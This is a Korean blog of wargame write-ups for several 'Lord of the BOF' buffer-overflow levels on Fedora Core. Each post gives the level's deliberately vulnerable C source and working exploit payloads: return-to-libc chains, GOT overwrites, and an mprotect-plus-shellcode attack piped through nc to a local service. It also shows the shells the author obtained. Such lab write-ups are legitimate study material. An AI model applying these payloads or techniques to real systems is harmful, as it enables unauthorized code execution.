dark_stone -> cruel

워게임/Lord Of the BOF 2013.10.15 14:42
크리에이티브 커먼즈 라이선스
Creative Commons License

 

[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

 

스택에 있는 값을 인자로 사용해 execve함수를 호출했습니다

 

 

[dark_stone@Fedora_2ndFloor ~]$ ./cruel $(perl -e 'print "\xf9\x84\x04\x08"x77, "\xbc\x2a\x83\x00"')
[dark_stone@Fedora_2ndFloor ~]$ /tmp/cruel_pwned -p
cruel_pwned-3.00$ whoami
cruel
cruel_pwned-3.00$ my-pass
euid = 501
come on, come over
cruel_pwned-3.00$  

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글

evil_wiard -> dark_stone

워게임/Lord Of the BOF 2013.10.15 14:14
크리에이티브 커먼즈 라이선스
Creative Commons License

 

 

이번 문제도 저번문제처럼 .bss에 RTL 페이로드를 복사해 풀려 했으나

execve함수에서 자꾸 Bad Address에러가 나서 실패했습니다

원인에 대한 분석을 언제할진 모르겠지만 하게되면 블로그에 올리겠습니다

 

그래서 printf -> system 으로 got overwrite 해 풀었습니다

 

풀면서 노트한 내용입니다

 

0x8048408 printf@PLT
0x804984c printf@GOT
0x8048438 strcpy@PLT
0x80484f3 ppr

0x007507c0 system@LIBC
0x00833603 "/bin/sh"@LIBC

strcpy( 0x8049850, "0x007507c0" )


0x80482b4 0xc0 0x8049850 \x4c\x98\x04\x08\xd0\x84\x04\x08
0x8048364 0x07 0x8049851 \x4d\x98\x04\x08\x64\x83\x04\x08
0x80484d0 0x75 0x8049852 \x4e\x98\x04\x08\xb4\x82\x04\x08
0x804833c 0x00 0x8049853 \x4f\x98\x04\x08\x3c\x83\x04\x08

strcpy + ppr \x38\x84\x04\x08\xf3\x84\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x4c\x98\x04\x08\xd0\x84\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4d\x98\x04\x08\x64\x83\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4e\x98\x04\x08\xb4\x82\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4f\x98\x04\x08\x3c\x83\x04\x08

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글

hell_fire -> evil_wizards

워게임/Lord Of the BOF 2013.10.12 11:38
크리에이티브 커먼즈 라이선스
Creative Commons License

 

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - evil_wizard
 - Local BOF on Fedora Core 3
 - hint : GOT overwriting
*/

// magic potion for you
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
int main(int argc, char *argv[])
{
 char buffer[256];
 char saved_sfp[4];
 int length;

 if(argc < 2){
  printf("argv error\n");
  exit(0);
 }

 // for disturbance RET sleding
 length = strlen(argv[1]);
  
        // healing potion for you
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());

 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, argv[1]);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 printf("%s\n", buffer);
}
[hell_fire@Fedora_1stFloor ~]$ 

 

아래는 원래 텍스트가 길어서 짤려서 보기좋게 개행했습니다

[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard $(perl -e 'print "A"x268,
"\xe8\x86\x04\x08", "A"x88, "\xac\x98\x04\x08", "\xe9\x86\
x04\x08"x100, "\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\
x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x0
8\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\
x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x0
4\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\
x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81
\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x
08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba
\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x
04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08", "\xe8\x86\x04\x08"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAH³.AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA¬....................................................................................鄄...............O°,O±TO²ȂO³ׄO¸HO¹Oº#O»ׄ脄
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$

 

 

힌트는 got overwrite라고 돼있는데 어떻게 해야할질 모르겠어서

.bss에 system함수 주소와 /bin/sh 문자열 주소를 복사한 후 fake ebp해 풀었습니다

 

 

아래는 문제를 풀면서 작성한 노트입니다

 

/bin/sh  0x833603
system  0x7507c0
.bss  0x080498b0
strcpy@plt 0x08048494
ppr  0x0804854f
leaveret 0x080486e8
fakeebp  .bss-4 ( 0x080498ac )


0x0804852c 0xc0 0x080498b0 \xb0\x98\x04\x08\x2c\x85\x04\x08
0x08048154 0x07 0x080498b1 \xb1\x98\x04\x08\x54\x81\x04\x08
0x080482c8 0x75 0x080498b2 \xb2\x98\x04\x08\xc8\x82\x04\x08
0x080484d7 0x00 0x080498b3 \xb3\x98\x04\x08\xd7\x84\x04\x08

0x08048148 0x03 0x080498b8 \xb8\x98\x04\x08\x48\x81\x04\x08
0x080481e0 0x36 0x080498b9 \xb9\x98\x04\x08\xe0\x81\x04\x08
0x08048523 0x83 0x080498ba \xba\x98\x04\x08\x23\x85\x04\x08
0x080484d7 0x00 0x080498bb \xbb\x98\x04\x08\xd7\x84\x04\x08

strcpy + plt \x94\x84\x04\x08\x4f\x85\x04\x08

\xb0\x98\x04\x08\x2c\x85\x04\x08
\xb1\x98\x04\x08\x54\x81\x04\x08
\xb2\x98\x04\x08\xc8\x82\x04\x08
\xb3\x98\x04\x08\xd7\x84\x04\x08
\xb8\x98\x04\x08\x48\x81\x04\x08
\xb9\x98\x04\x08\xe0\x81\x04\x08
\xba\x98\x04\x08\x23\x85\x04\x08
\xbb\x98\x04\x08\xd7\x84\x04\x08

\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08

 

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글

dark_eyes -> hell_fire

워게임/Lord Of the BOF 2013.10.10 21:48
크리에이티브 커먼즈 라이선스
Creative Commons License

 

[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - hell_fire
 - Remote BOF on Fedora Core 3
 - hint : another fake ebp or got overwriting
 - port : TCP 7777
*/

#include <stdio.h>

int main()
{
 char buffer[256];
 char saved_sfp[4];
 char temp[1024];
 
 printf("hell_fire : What's this smell?\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

 printf("%s\n", buffer);

소스입니다

fgets를 사용하기때문에 stdin으로 fake ebp해 mprotect로 rwx권한을 줘 쉘코드를 실행했습니다

 

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x38\x86\x04\x08", "B"x88, "\xf0\xe1\xff\xf6", "\x38\x86\x04\x08", "A"x132, "\x70\x46\x71\x00", "\x58\xe2\xff\xf6", "\x00\xe0\xff\xf6", "\x00\x08\x00\x00", "\x07\x00\x00\x00", "\x90"x300, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"';cat)|nc localhost 7777
hell_fire : What's this smell?
you :

my-pass
euid = 503
sign me up

 

아래는 풀면서 노트한 내용입니다

 

stdin+500으로 fake ebp

stdin = 0xf6ffe000

stdin+500 mprotect (0x714670)
stdin+504 0xf6ffe258
stdin+508 &stdin  (0xf6ffe000)
stdin+512 len  (0x00000800)
stdin+516 prot  (0x00000007)

stdin+600(0xf6ffe258) nop+shellcode

leaveret 0x8048638

mprotect(&stdin, 2048, 7);
 

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글


티스토리 툴바